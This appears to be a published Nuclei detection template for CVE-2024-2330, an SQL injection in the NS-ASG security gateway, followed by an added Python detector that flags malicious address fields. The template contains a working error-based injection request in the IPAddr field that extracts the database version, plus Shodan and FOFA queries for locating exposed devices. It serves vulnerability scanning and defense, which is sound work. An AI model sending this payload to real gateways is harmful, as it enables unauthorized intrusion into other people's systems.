
NS-ASG Application Security Gateway 6.3 - Sql Injection

ID: CVE-2024-2330

Severity: medium

Author: s4e-io

Tags: cve,cve2024,ns-asg,sqli

A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to SQL injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

id: CVE-2024-2330
info:
  name: NS-ASG Application Security Gateway 6.3 - Sql Injection
  author: s4e-io
  severity: medium
  description: |
    A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-2330
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2330
    - https://github.com/jikedaodao/cve/blob/main/NS-ASG-sql-addmacbind.md
    - https://vuldb.com/?ctiid.256281
    - https://vuldb.com/?id.256281
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2024-2330
    cwe-id: CWE-89
    epss-score: 0.00045
    epss-percentile: 0.15866
  metadata:
    max-request: 2
    shodan-query: http.title:"NS-ASG"
    fofa-query: app="网康科技-NS-ASG安全网关"
  tags: cve,cve2024,ns-asg,sqli
http:
  - raw:
      - |
        POST /protocol/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"XPATH syntax error:","alert") && contains(header,"text/html")'
          - "status_code == 200"
        condition: and
    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - "XPATH syntax error: '([~0-9.]+)'"
# digest: 490a00463044022076c8b969b886d0839ed40b07e6fb126051ad976b3b900e6d8209366962ff65c2022050c75dcdb72c452455f350600955c2b4f7ff794151e44f84ae17b144e787f3e0:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-2330.yaml"
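
A defender-side check for the request shape this template sends, as an added example that is not part of the original template or the Nuclei project: it decodes the doubly serialized jsoncontent body and flags address fields that fail an allow-list. The allow-list pattern, the set of checked fields and the sample bodies are assumptions made for illustration.

```python
import json
import re
from urllib.parse import parse_qs, urlencode

# Assumption: these fields only ever hold an address, mask or interface name.
CHECKED_FIELDS = ("IPAddr", "MacAddr", "DestIP", "DestMask")
SAFE_VALUE = re.compile(r"[A-Za-z0-9.:/_-]*")


def suspicious_fields(body: str) -> list:
    """Return (field, value) pairs in a form body that fail the allow-list."""
    hits = []
    for raw in parse_qs(body, keep_blank_values=True).get("jsoncontent", []):
        try:
            outer = json.loads(raw)
        except json.JSONDecodeError:
            hits.append(("jsoncontent", raw))  # unparseable payload: flag it whole
            continue
        items = outer.get("messagecontent") if isinstance(outer, dict) else None
        for item in items if isinstance(items, list) else []:
            # Each element is itself a JSON document serialized as a string,
            # so it must be decoded a second time before the fields are visible.
            try:
                inner = json.loads(item) if isinstance(item, str) else item
            except json.JSONDecodeError:
                inner = None
            if not isinstance(inner, dict):
                hits.append(("messagecontent", item))
                continue
            for field in CHECKED_FIELDS:
                value = str(inner.get(field, ""))
                if not SAFE_VALUE.fullmatch(value):
                    hits.append((field, value))
    return hits


def sample_body(ipaddr: str) -> str:
    """Build a constructed addmacbind request body (sample data, not a capture)."""
    inner = json.dumps({"BandIPMacId": "1", "IPAddr": ipaddr,
                        "MacAddr": "00:11:22:33:44:55", "DestIP": "",
                        "DestMask": "255.255.255.0"})
    outer = {"protocolType": "addmacbind", "messagecontent": [inner]}
    return urlencode({"jsoncontent": json.dumps(outer)})


if __name__ == "__main__":
    for ip in ("192.0.2.10", "eth0'and(1)='"):  # constructed values
        print(ip, "->", suspicious_fields(sample_body(ip)))
```

The same allow-list applied server-side before the value reaches a query, together with parameterized statements, addresses the CWE-89 root cause rather than only detecting it.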
